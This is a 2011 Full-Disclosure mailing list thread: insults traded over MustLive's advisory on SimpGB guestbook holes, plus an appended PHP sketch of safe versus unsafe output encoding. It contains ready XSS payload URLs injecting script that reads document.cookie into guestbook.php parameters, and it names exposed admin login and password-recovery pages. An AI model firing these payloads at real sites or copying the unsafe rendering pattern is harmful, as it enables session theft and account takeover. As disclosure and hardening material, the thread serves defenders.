Message-ID: <4D4E7B56.1080808@gmail.com>
Date: Sun, 06 Feb 2011 11:43:34 +0100
From: Michele Orru <antisnatchor@...il.com>
To: laurent gaffie <laurent.gaffie@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, MustLive <mustlive@...security.com.ua>
Subject: Re: Multiple vulnerabilities in SimpGB
ahaah.
Nice reply Sparky.
MustLive, seems you've been defaced :-)
antisnatchor
> ------------------------------------------------------------------------
>
> laurent gaffie <mailto:laurent.gaffie@...il.com>
> February 5, 2011 3:36 AM
>
>
> Hey Sparky,
>
> One of the many, many things you didn't understand during the past 5
> years is that you should probably try to identify and fix your stuff
> on *your* website, before spamming this ML with your crap.
> cf:
> http://www.zone-h.org/mirror/id/11367858
>
> e-tard.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ------------------------------------------------------------------------
>
> MustLive <mailto:mustlive@...security.com.ua>
> February 4, 2011 10:49 PM
>
>
> Hello Laurent!
>
> You are a very "intelligent" man, as I see from this and your previous
> letter (in 2010).
>
> You need to take into account the following:
>
> 1. I know better where to send.
>
> 2. If you write shitty stuff, then it doesn't mean that others do the same.
>
> 3. No need to think and state instead of other people - if it's not
> interesting for you, then it can be interesting for others.
>
> 4. The main and obvious thing is that I have written all my advisories since
> 2006 for those people who are interested in them (and there are such
> people, as I know for sure). So if you or anybody else is not interested in
> them, just skip them (and don't need to write me nonsense) - I'm writing my
> letters not for you, but for others who are interested in them and who thank
> me for my work. It's strange that such an "intelligent" man as you didn't
> understand it for the last five years :-).
>
> 5. I don't need any non-serious letters from you, so don't waste your time
> writing me anymore, because I've put your e-mail into a blacklist. Spend
> your time on good things.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ----- Original Message -----
> From: laurent gaffie
> To: MustLive
> Cc: full-disclosure@...ts.grok.org.uk ; bugtraq@...urityfocus.com
> Sent: Wednesday, January 26, 2011 5:09 PM
> Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
>
>
> Send your shitty stuff to bugtraq@...urityfocus.com
>
> If it's not obvious, no one gives a shit here, seriously.
>
>
>
> 2011/1/27 MustLive <mustlive@...security.com.ua>
>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> POST request to the page http://site/guestbook.php in the parameters poster,
> postingid and location in the Preview function. If a captcha is used in the
> guestbook, then a working captcha code is required for the attack. Or
> via GET request:
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> ------------
> Timeline:
> ------------
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
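
Added example, not part of the original thread and not SimpGB source code: the XSS entries in the quoted advisory describe the values of poster, postingid and location being reflected by the Preview function of guestbook.php. The sketch below contrasts an unencoded reflection with a hardened one; the markup, the function names and the treatment of postingid as a numeric id are assumptions.

```php
<?php
// Added illustration: hypothetical preview renderer, not SimpGB source code.
// Field names follow the advisory (poster, postingid, location); the markup is assumed.

/** Encode a value for HTML element content or a quoted attribute value. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable pattern: request values are concatenated into markup unencoded. */
function render_preview_unsafe(array $in): string
{
    return '<input type="hidden" name="postingid" value="' . ($in['postingid'] ?? '') . '">'
         . '<input type="text" name="location" value="' . ($in['location'] ?? '') . '">'
         . '<p class="poster">' . ($in['poster'] ?? '') . '</p>';
}

/** Hardened pattern: validate the numeric id, encode every reflected string. */
function render_preview_safe(array $in): string
{
    // Assumption: postingid is a non-negative integer id; anything else becomes 0.
    $id = filter_var($in['postingid'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) { $id = 0; }
    // Reject array-valued parameters (e.g. poster[]=x) before encoding.
    $poster   = is_string($in['poster'] ?? null) ? $in['poster'] : '';
    $location = is_string($in['location'] ?? null) ? $in['location'] : '';

    return '<input type="hidden" name="postingid" value="' . $id . '">'
         . '<input type="text" name="location" value="' . h($location) . '">'
         . '<p class="poster">' . h($poster) . '</p>';
}

// Constructed input: the URL-decoded values from the advisory's GET requests.
$probe = [
    'postingid' => '"><script>alert(document.cookie)</script>',
    'location'  => '"><script>alert(document.cookie)</script>',
    'poster'    => '<script>alert(document.cookie)</script>',
];

$unsafe = render_preview_unsafe($probe);
$safe   = render_preview_safe($probe);

// Self-check: the unsafe markup carries a live <script> tag, the safe markup must not.
if (strpos($unsafe, '<script>') === false || strpos($safe, '<script>') !== false) {
    throw new RuntimeException('unexpected encoding result');
}
echo $safe, PHP_EOL;
```

`ENT_QUOTES` matters for the attribute-context fields: without it a single-quoted attribute could still be closed by the reflected value.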